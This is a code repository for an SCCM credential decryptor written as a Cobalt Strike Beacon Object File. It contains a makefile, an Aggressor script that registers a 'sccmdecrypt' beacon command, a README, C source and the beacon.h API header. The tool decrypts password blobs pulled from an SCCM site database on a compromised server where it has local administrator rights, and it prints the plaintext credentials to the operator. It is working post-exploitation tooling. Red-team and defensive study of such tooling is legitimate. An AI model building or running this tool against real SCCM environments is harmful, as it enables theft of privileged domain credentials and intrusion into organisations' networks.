├── makefile ├── sccmdecrypt.cna ├── README.md ├── SCCMDecryptor.c └── beacon.h /makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := sccmdecryptor 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | OPTIONS := -O3 -masm=intel -Wall -Wextra 8 | 9 | .PHONY: all clean x64 x86 10 | 11 | all: x64 x86 12 | 13 | x64: 14 | $(CC_x64) -o $(BOFNAME).x64.o $(OPTIONS) -c sccmdecryptor.c -DBOF -Wno-unused-parameter 15 | $(STRIP_x64) --strip-unneeded $(BOFNAME).x64.o 16 | 17 | x86: 18 | $(CC_x86) -o $(BOFNAME).x86.o $(OPTIONS) -c sccmdecryptor.c -DBOF -Wno-unused-parameter 19 | $(STRIP_x86) --strip-unneeded $(BOFNAME).x86.o 20 | 21 | clean: 22 | rm -f $(BOFNAME).x64.o $(BOFNAME).x86.o 23 | -------------------------------------------------------------------------------- /sccmdecrypt.cna: -------------------------------------------------------------------------------- 1 | alias sccmdecrypt { 2 | local('$barch $handle $data $args'); 3 | 4 | # Check for arguments 5 | if ($2 eq "") { 6 | berror($1, "Please provide hex string to decrypt"); 7 | return; 8 | } 9 | 10 | # Get architecture of beacon 11 | $barch = barch($1); 12 | 13 | # Read in the right BOF file 14 | $handle = openf(script_resource("sccmdecryptor. $+ $barch $+ .o")); 15 | $data = readb($handle, -1); 16 | closef($handle); 17 | 18 | # Pack our arguments - just a single string 19 | $args = bof_pack($1, "z", $2); 20 | 21 | # Announce what we're doing 22 | btask($1, "Attempting to decrypt SCCM string"); 23 | 24 | # Execute it 25 | beacon_inline_execute($1, $data, "go", $args); 26 | } 27 | 28 | beacon_command_register( 29 | "sccmdecrypt", 30 | "Decrypt SCCM encrypted strings", 31 | "Usage: sccmdecrypt " 32 | ); 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SCCMDecryptor BOF 2 | A Beacon Object File (BOF) implementation of Adam Chester's [@xpn's](https://x.com/_xpn_) [c# tool](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1) for decrypting SCCM encrypted password blobs retrieved from the site DB. This tool needs to be run on an SCCM server containing the "Microsoft Systems Management Server" CSP. 3 | ![image](https://github.com/user-attachments/assets/a39dbf72-a8f7-4428-b337-6c5f7bcf41e2) 4 | 5 | 6 | 7 | ## Building 8 | 9 | Requirements: 10 | - MinGW-w64 (for cross-compilation) 11 | - Make 12 | 13 | To build both x64 and x86 versions: 14 | ```bash 15 | make 16 | ``` 17 | 18 | ## Usage 19 | 20 | 2. In a beacon running in local administrator context on an SCCM server, use the command: 21 | ``` 22 | beacon> sccmdecrypt 23 | ``` 24 | where hex_string is the encrypted credential blob retrieved from the SCCM database. 25 | Example: 26 | 27 | ![image](https://github.com/user-attachments/assets/ecb681a8-04d5-4f7e-b2d2-84ac321a2002) 28 | 29 | 30 | ## Credits 31 | 32 | This is a BOF implementation of the original C# SCCM decryptor tool created by [@_xpn_](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1). 33 | - [Misconfiguration Manager Cred-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md) 34 | -------------------------------------------------------------------------------- /SCCMDecryptor.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | // Function declarations 5 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptAcquireContextW(HCRYPTPROV*, LPCWSTR, LPCWSTR, DWORD, DWORD); 6 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptImportKey(HCRYPTPROV, CONST BYTE*, DWORD, HCRYPTKEY, DWORD, HCRYPTKEY*); 7 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDecrypt(HCRYPTKEY, HCRYPTHASH, BOOL, DWORD, BYTE*, DWORD*); 8 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY hKey); 9 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptReleaseContext(HCRYPTPROV hProv, DWORD dwFlags); 10 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); 11 | 12 | // MSVCRT Function declarations 13 | DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char *_Str); 14 | DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size); 15 | DECLSPEC_IMPORT void __cdecl MSVCRT$free(void *ptr); 16 | DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char *str, char **endptr, int base); 17 | 18 | // Helper function to decode hex string 19 | BOOL DecodeHexString(const char* input, BYTE** output, DWORD* outLen) { 20 | DWORD inputLen = (DWORD)MSVCRT$strlen(input); 21 | 22 | if (inputLen % 2 != 0) { 23 | return FALSE; 24 | } 25 | 26 | *outLen = inputLen / 2; 27 | *output = (BYTE*)MSVCRT$malloc(*outLen); 28 | 29 | if (!*output) { 30 | return FALSE; 31 | } 32 | 33 | for (DWORD i = 0; i < inputLen; i += 2) { 34 | char hex[3] = {input[i], input[i+1], 0}; 35 | (*output)[i/2] = (BYTE)MSVCRT$strtol(hex, NULL, 16); 36 | } 37 | 38 | return TRUE; 39 | } 40 | 41 | void go(char* args, int len) { 42 | datap parser; 43 | char* hexString; 44 | int stringLen; 45 | HCRYPTPROV hProv = 0; 46 | HCRYPTKEY hKey = 0; 47 | BYTE* inputData = NULL; 48 | DWORD dataLen = 0; 49 | 50 | // Initialize parser 51 | BeaconDataParse(&parser, args, len); 52 | hexString = BeaconDataExtract(&parser, &stringLen); 53 | 54 | if (!hexString) { 55 | BeaconPrintf(CALLBACK_ERROR, "Error: No input string provided\n"); 56 | return; 57 | } 58 | 59 | if (!DecodeHexString(hexString, &inputData, &dataLen)) { 60 | BeaconPrintf(CALLBACK_ERROR, "Error: Failed to decode hex string\n"); 61 | return; 62 | } 63 | 64 | DWORD keyLength = *(DWORD*)inputData; 65 | DWORD decryptedLength = *(DWORD*)(inputData + 4); 66 | 67 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Key Length: %d\n[*] Expecting Decrypted Length: %d\n", keyLength, decryptedLength); 68 | 69 | if (dataLen < (8 + keyLength)) { 70 | BeaconPrintf(CALLBACK_ERROR, "Error: Invalid data length\n"); 71 | goto cleanup; 72 | } 73 | 74 | DWORD cryptLength = dataLen - 8 - keyLength; 75 | BYTE* key = inputData + 8; 76 | 77 | if (!ADVAPI32$CryptAcquireContextW(&hProv, 78 | L"Microsoft Systems Management Server", 79 | L"Microsoft Enhanced RSA and AES Cryptographic Provider", 80 | 0x18, 81 | 96U) && 82 | !ADVAPI32$CryptAcquireContextW(&hProv, 83 | L"Microsoft Systems Management Server", 84 | NULL, 85 | 0x18, 86 | 104U)) 87 | { 88 | BeaconPrintf(CALLBACK_ERROR, "Error: CryptAcquireContext failed (%d)\n", KERNEL32$GetLastError()); 89 | goto cleanup; 90 | } 91 | 92 | if (!ADVAPI32$CryptImportKey(hProv, key, keyLength, 0, 0, &hKey)) { 93 | BeaconPrintf(CALLBACK_ERROR, "Error: CryptImportKey failed (%d)\n", KERNEL32$GetLastError()); 94 | goto cleanup; 95 | } 96 | 97 | // crypted points into inputData buffer, no allocation needed 98 | BYTE* crypted = inputData + 8 + keyLength; 99 | 100 | if (!ADVAPI32$CryptDecrypt(hKey, 0, TRUE, 0, crypted, &cryptLength)) { 101 | BeaconPrintf(CALLBACK_ERROR, "Error: CryptDecrypt failed (%d)\n", KERNEL32$GetLastError()); 102 | goto cleanup; 103 | } 104 | 105 | crypted[cryptLength] = 0; 106 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Decrypted: %s\n", crypted); 107 | 108 | cleanup: 109 | if (hKey) 110 | ADVAPI32$CryptDestroyKey(hKey); 111 | if (hProv) 112 | ADVAPI32$CryptReleaseContext(hProv, 0); 113 | if (inputData) 114 | MSVCRT$free(inputData); 115 | } 116 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | * 7/18/2023: Added BeaconInformation API for 4.9 14 | * 7/31/2023: Added Key/Value store APIs for 4.9 15 | * BeaconAddValue, BeaconGetValue, and BeaconRemoveValue 16 | * 8/31/2023: Added Data store APIs for 4.9 17 | * BeaconDataStoreGetItem, BeaconDataStoreProtectItem, 18 | * BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries 19 | * 9/01/2023: Added BeaconGetCustomUserData API for 4.9 20 | * 3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL 21 | * Updated the BEACON_INFO data structure to add new parameters 22 | * 4/19/2024: Added BeaconGetSyscallInformation API for 4.10 23 | * 4/25/2024: Added APIs to call Beacon's system call implementation 24 | */ 25 | #ifndef _BEACON_H_ 26 | #define _BEACON_H_ 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif // __cplusplus 32 | 33 | /* data API */ 34 | typedef struct { 35 | char * original; /* the original buffer [so we can free it] */ 36 | char * buffer; /* current pointer into our buffer */ 37 | int length; /* remaining length of data */ 38 | int size; /* total size of this buffer */ 39 | } datap; 40 | 41 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 42 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 43 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 44 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 45 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 46 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 47 | 48 | /* format API */ 49 | typedef struct { 50 | char * original; /* the original buffer [so we can free it] */ 51 | char * buffer; /* current pointer into our buffer */ 52 | int length; /* remaining length of data */ 53 | int size; /* total size of this buffer */ 54 | } formatp; 55 | 56 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 57 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 58 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, const char * text, int len); 59 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, const char * fmt, ...); 60 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 61 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 62 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 63 | 64 | /* Output Functions */ 65 | #define CALLBACK_OUTPUT 0x0 66 | #define CALLBACK_OUTPUT_OEM 0x1e 67 | #define CALLBACK_OUTPUT_UTF8 0x20 68 | #define CALLBACK_ERROR 0x0d 69 | #define CALLBACK_CUSTOM 0x1000 70 | #define CALLBACK_CUSTOM_LAST 0x13ff 71 | 72 | 73 | DECLSPEC_IMPORT void BeaconOutput(int type, const char * data, int len); 74 | DECLSPEC_IMPORT void BeaconPrintf(int type, const char * fmt, ...); 75 | 76 | 77 | /* Token Functions */ 78 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 79 | DECLSPEC_IMPORT void BeaconRevertToken(); 80 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 81 | 82 | /* Spawn+Inject Functions */ 83 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 84 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 85 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 86 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 87 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 88 | 89 | /* Utility Functions */ 90 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 91 | 92 | /* Beacon Information */ 93 | /* 94 | * ptr - pointer to the base address of the allocated memory. 95 | * size - the number of bytes allocated for the ptr. 96 | */ 97 | typedef struct { 98 | char * ptr; 99 | size_t size; 100 | } HEAP_RECORD; 101 | #define MASK_SIZE 13 102 | 103 | /* Information the user can set in the USER_DATA via a UDRL */ 104 | typedef enum { 105 | PURPOSE_EMPTY, 106 | PURPOSE_GENERIC_BUFFER, 107 | PURPOSE_BEACON_MEMORY, 108 | PURPOSE_SLEEPMASK_MEMORY, 109 | PURPOSE_BOF_MEMORY, 110 | PURPOSE_USER_DEFINED_MEMORY = 1000 111 | } ALLOCATED_MEMORY_PURPOSE; 112 | 113 | typedef enum { 114 | LABEL_EMPTY, 115 | LABEL_BUFFER, 116 | LABEL_PEHEADER, 117 | LABEL_TEXT, 118 | LABEL_RDATA, 119 | LABEL_DATA, 120 | LABEL_PDATA, 121 | LABEL_RELOC, 122 | LABEL_USER_DEFINED = 1000 123 | } ALLOCATED_MEMORY_LABEL; 124 | 125 | typedef enum { 126 | METHOD_UNKNOWN, 127 | METHOD_VIRTUALALLOC, 128 | METHOD_HEAPALLOC, 129 | METHOD_MODULESTOMP, 130 | METHOD_NTMAPVIEW, 131 | METHOD_USER_DEFINED = 1000, 132 | } ALLOCATED_MEMORY_ALLOCATION_METHOD; 133 | 134 | /** 135 | * This structure allows the user to provide additional information 136 | * about the allocated heap for cleanup. It is mandatory to provide 137 | * the HeapHandle but the DestroyHeap Boolean can be used to indicate 138 | * whether the clean up code should destroy the heap or simply free the pages. 139 | * This is useful in situations where a loader allocates memory in the 140 | * processes current heap. 141 | */ 142 | typedef struct _HEAPALLOC_INFO { 143 | PVOID HeapHandle; 144 | BOOL DestroyHeap; 145 | } HEAPALLOC_INFO, *PHEAPALLOC_INFO; 146 | 147 | typedef struct _MODULESTOMP_INFO { 148 | HMODULE ModuleHandle; 149 | } MODULESTOMP_INFO, *PMODULESTOMP_INFO; 150 | 151 | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION { 152 | HEAPALLOC_INFO HeapAllocInfo; 153 | MODULESTOMP_INFO ModuleStompInfo; 154 | PVOID Custom; 155 | } ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION; 156 | 157 | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION { 158 | BOOL Cleanup; 159 | ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod; 160 | ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation; 161 | } ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION; 162 | 163 | typedef struct _ALLOCATED_MEMORY_SECTION { 164 | ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development 165 | PVOID BaseAddress; // Pointer to virtual address of section 166 | SIZE_T VirtualSize; // Virtual size of the section 167 | DWORD CurrentProtect; // Current memory protection of the section 168 | DWORD PreviousProtect; // The previous memory protection of the section (prior to masking/unmasking) 169 | BOOL MaskSection; // A boolean to indicate whether the section should be masked 170 | } ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION; 171 | 172 | typedef struct _ALLOCATED_MEMORY_REGION { 173 | ALLOCATED_MEMORY_PURPOSE Purpose; // A label to indicate the purpose of the allocated memory 174 | PVOID AllocationBase; // The base address of the allocated memory block 175 | SIZE_T RegionSize; // The size of the allocated memory block 176 | DWORD Type; // The type of memory allocated 177 | ALLOCATED_MEMORY_SECTION Sections[8]; // An array of section information structures 178 | ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation 179 | } ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION; 180 | 181 | typedef struct { 182 | ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6]; 183 | } ALLOCATED_MEMORY, *PALLOCATED_MEMORY; 184 | 185 | /* 186 | * version - The version of the beacon dll was added for release 4.10 187 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 188 | * e.g. 0x040900 -> CS 4.9 189 | * 0x041000 -> CS 4.10 190 | * 191 | * sleep_mask_ptr - pointer to the sleep mask base address 192 | * sleep_mask_text_size - the sleep mask text section size 193 | * sleep_mask_total_size - the sleep mask total memory size 194 | * 195 | * beacon_ptr - pointer to beacon's base address 196 | * The stage.obfuscate flag affects this value when using CS default loader. 197 | * true: beacon_ptr = allocated_buffer - 0x1000 (Not a valid address) 198 | * false: beacon_ptr = allocated_buffer (A valid address) 199 | * For a UDRL the beacon_ptr will be set to the 1st argument to DllMain 200 | * when the 2nd argument is set to DLL_PROCESS_ATTACH. 201 | * heap_records - list of memory addresses on the heap beacon wants to mask. 202 | * The list is terminated by the HEAP_RECORD.ptr set to NULL. 203 | * mask - the mask that beacon randomly generated to apply 204 | * 205 | * Added in version 4.10 206 | * allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA 207 | * via a UDRL. 208 | */ 209 | typedef struct { 210 | unsigned int version; 211 | char * sleep_mask_ptr; 212 | DWORD sleep_mask_text_size; 213 | DWORD sleep_mask_total_size; 214 | 215 | char * beacon_ptr; 216 | HEAP_RECORD * heap_records; 217 | char mask[MASK_SIZE]; 218 | 219 | ALLOCATED_MEMORY allocatedMemory; 220 | } BEACON_INFO, *PBEACON_INFO; 221 | 222 | DECLSPEC_IMPORT BOOL BeaconInformation(PBEACON_INFO info); 223 | 224 | /* Key/Value store functions 225 | * These functions are used to associate a key to a memory address and save 226 | * that information into beacon. These memory addresses can then be 227 | * retrieved in a subsequent execution of a BOF. 228 | * 229 | * key - the key will be converted to a hash which is used to locate the 230 | * memory address. 231 | * 232 | * ptr - a memory address to save. 233 | * 234 | * Considerations: 235 | * - The contents at the memory address is not masked by beacon. 236 | * - The contents at the memory address is not released by beacon. 237 | * 238 | */ 239 | DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr); 240 | DECLSPEC_IMPORT void * BeaconGetValue(const char * key); 241 | DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key); 242 | 243 | /* Beacon Data Store functions 244 | * These functions are used to access items in Beacon's Data Store. 245 | * BeaconDataStoreGetItem returns NULL if the index does not exist. 246 | * 247 | * The contents are masked by default, and BOFs must unprotect the entry 248 | * before accessing the data buffer. BOFs must also protect the entry 249 | * after the data is not used anymore. 250 | * 251 | */ 252 | 253 | #define DATA_STORE_TYPE_EMPTY 0 254 | #define DATA_STORE_TYPE_GENERAL_FILE 1 255 | 256 | typedef struct { 257 | int type; 258 | DWORD64 hash; 259 | BOOL masked; 260 | char* buffer; 261 | size_t length; 262 | } DATA_STORE_OBJECT, *PDATA_STORE_OBJECT; 263 | 264 | DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index); 265 | DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index); 266 | DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index); 267 | DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries(); 268 | 269 | /* Beacon User Data functions */ 270 | DECLSPEC_IMPORT char * BeaconGetCustomUserData(); 271 | 272 | /* Beacon System call */ 273 | /* Syscalls API */ 274 | typedef struct 275 | { 276 | PVOID fnAddr; 277 | PVOID jmpAddr; 278 | DWORD sysnum; 279 | } SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY; 280 | 281 | typedef struct 282 | { 283 | SYSCALL_API_ENTRY ntAllocateVirtualMemory; 284 | SYSCALL_API_ENTRY ntProtectVirtualMemory; 285 | SYSCALL_API_ENTRY ntFreeVirtualMemory; 286 | SYSCALL_API_ENTRY ntGetContextThread; 287 | SYSCALL_API_ENTRY ntSetContextThread; 288 | SYSCALL_API_ENTRY ntResumeThread; 289 | SYSCALL_API_ENTRY ntCreateThreadEx; 290 | SYSCALL_API_ENTRY ntOpenProcess; 291 | SYSCALL_API_ENTRY ntOpenThread; 292 | SYSCALL_API_ENTRY ntClose; 293 | SYSCALL_API_ENTRY ntCreateSection; 294 | SYSCALL_API_ENTRY ntMapViewOfSection; 295 | SYSCALL_API_ENTRY ntUnmapViewOfSection; 296 | SYSCALL_API_ENTRY ntQueryVirtualMemory; 297 | SYSCALL_API_ENTRY ntDuplicateObject; 298 | SYSCALL_API_ENTRY ntReadVirtualMemory; 299 | SYSCALL_API_ENTRY ntWriteVirtualMemory; 300 | SYSCALL_API_ENTRY ntReadFile; 301 | SYSCALL_API_ENTRY ntWriteFile; 302 | SYSCALL_API_ENTRY ntCreateFile; 303 | } SYSCALL_API, *PSYSCALL_API; 304 | 305 | /* Additional Run Time Library (RTL) addresses used to support system calls. 306 | * If they are not set then system calls that require them will fall back 307 | * to the Standard Windows API. 308 | * 309 | * Required to support the following system calls: 310 | * ntCreateFile 311 | */ 312 | typedef struct 313 | { 314 | PVOID rtlDosPathNameToNtPathNameUWithStatusAddr; 315 | PVOID rtlFreeHeapAddr; 316 | PVOID rtlGetProcessHeapAddr; 317 | } RTL_API, *PRTL_API; 318 | 319 | typedef struct 320 | { 321 | PSYSCALL_API syscalls; 322 | PRTL_API rtls; 323 | } BEACON_SYSCALLS, *PBEACON_SYSCALLS; 324 | 325 | DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, BOOL resolveIfNotInitialized); 326 | 327 | /* Beacon System call functions which will use the current system call method */ 328 | DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 329 | DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 330 | DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 331 | DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 332 | DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 333 | DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 334 | DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 335 | DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle); 336 | DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId); 337 | DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId); 338 | DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object); 339 | DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress); 340 | DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length); 341 | DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions); 342 | DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 343 | DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 344 | 345 | /* Beacon Gate APIs */ 346 | DECLSPEC_IMPORT VOID BeaconDisableBeaconGate(); 347 | DECLSPEC_IMPORT VOID BeaconEnableBeaconGate(); 348 | 349 | /* Beacon User Data 350 | * 351 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 352 | * e.g. 0x040900 -> CS 4.9 353 | * 0x041000 -> CS 4.10 354 | */ 355 | 356 | #define DLL_BEACON_USER_DATA 0x0d 357 | #define BEACON_USER_DATA_CUSTOM_SIZE 32 358 | typedef struct 359 | { 360 | unsigned int version; 361 | PSYSCALL_API syscalls; 362 | char custom[BEACON_USER_DATA_CUSTOM_SIZE]; 363 | PRTL_API rtls; 364 | PALLOCATED_MEMORY allocatedMemory; 365 | } USER_DATA, * PUSER_DATA; 366 | 367 | #ifdef __cplusplus 368 | } 369 | #endif // __cplusplus 370 | #endif // _BEACON_H_ 371 | --------------------------------------------------------------------------------